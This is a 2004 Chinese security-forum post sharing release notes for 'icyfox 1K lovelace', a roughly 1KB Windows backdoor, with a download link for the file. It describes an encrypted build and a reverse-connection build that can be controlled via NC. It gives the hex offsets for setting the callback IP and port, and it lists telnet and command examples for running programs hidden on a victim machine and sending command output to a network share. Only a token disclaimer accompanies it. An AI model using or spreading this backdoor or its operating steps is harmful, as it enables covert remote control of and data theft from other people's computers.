论坛: 菜鸟乐园 标题: 冰狐1K浪子微型后门~转 复制本贴地址    
作者: yimarong [yimarong]    版主   登录
冰狐1K浪子微型后门
                (愚人节特别奉献)  呵呵~我是没有测试的,大家有兴趣可以试试!

版权声明:
请不要用于非法用途,否则后果自行负担!

本后门是我在学习PE文件格式时,用来试验的作品!
可算得上是WINDOWS系统下最小的后门啦!仅仅只有1k大小而已!

版本1.2用反向连接来实现,使得代码更少(API用的少呀!),所以功能有所增强,可以使用参数,从而支持DOS命令,但不回显,可以用>来重定向弥补。

如有任何BUG,请致信icyfox@eyou.com或QQ:76416026联系!

有兴趣的网友可以自己做一个!到时别忘了给我一份呀!

版本更新:
一:icyfox1klovelace1.0.exe

这个版本在Win2000下测试成功!
因为WinME中DataDirectory中第十(0Ah)个(IMAGE_DIRECTORY_ENTRY_TLS)位置处必须是全零
所以这个版本无法在WinME下正常运行。
同时这个版本进行了xor加密处理!
最大的特色是我把自己的网名(冰狐浪子)融入到了解密代码中(嘿~:~嘿)

运行成功标志:MZER


二:icyfox1klovelace1.1.exe
这个版本在WinME和Win2000下均测试成功!没有加密!推荐。。。

运行成功标志:冰狐浪子Q76416026

三:icyfox1klovelace1.2.exe
反向连接版本,可以使用NC或VNC来控制
默认I  P:127.000.000.001    修改(3C5h-3D3h)
默认port:8201(十六进制2009h)    修改(3D5h-3D6h)
可以使用winhex来修改ip和port

(反向连接版本支持运行参数,所以可以运行dos 命令)
如:
win2000:
0>cmd.exe /c dir c:\ >\\127.0.0.1\c\冰狐浪子.txt
win98:
0>command.com /c dir c:\ >\\127.0.0.1\c\冰狐浪子.txt

其中0>为运行标志,0:隐蔽运行1:正常运行

运行成功标志:冰狐浪子Q76416026


1.0和1.1版的使用方法:

用telnet进行连接,端口为8201
然后直接输入要运行的程序或要打开的文件的路径(当然也可以是网址)
后面再加上 >(0或1)

0:隐蔽运行
1:正常运行
(支持UNC网络路径,但不支持参数)

注意:五分钟内没有数据传输,则会自动断开连接!


例:
telnet 127.0.0.1 8201

1.打开指定网页:
http://www.godog.y365.com>1

2.正常运行指定程序:
\\127.0.0.1\c\冰狐浪子.exe>1

3.隐蔽运行指定程序:
\\127.0.0.1\c\冰狐浪子.exe>0

4.打开指定文件:
\\127.0.0.1\c\冰狐浪子.txt>1

5.弹出一个对话框:
javascript:alert("友情提醒:\r\n我是冰狐浪子,发现冰狐1K浪子微型后门!")>1

==============================================================
        Copyright (C) 2004.4.1 icyfox
          mailto:icyfox@eyou.com
        http://www.godog.y365.com
        http://www.icyfox.y365.com  
下载cyfox1k.cab: https://www.xfocus.net/bbs/index.php?act=Attach&type=post&id=123893


[此贴被 嘶风(yimarong) 在 04月03日11时33分 编辑过]

地主 发表时间: 04-04-03 11:31

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号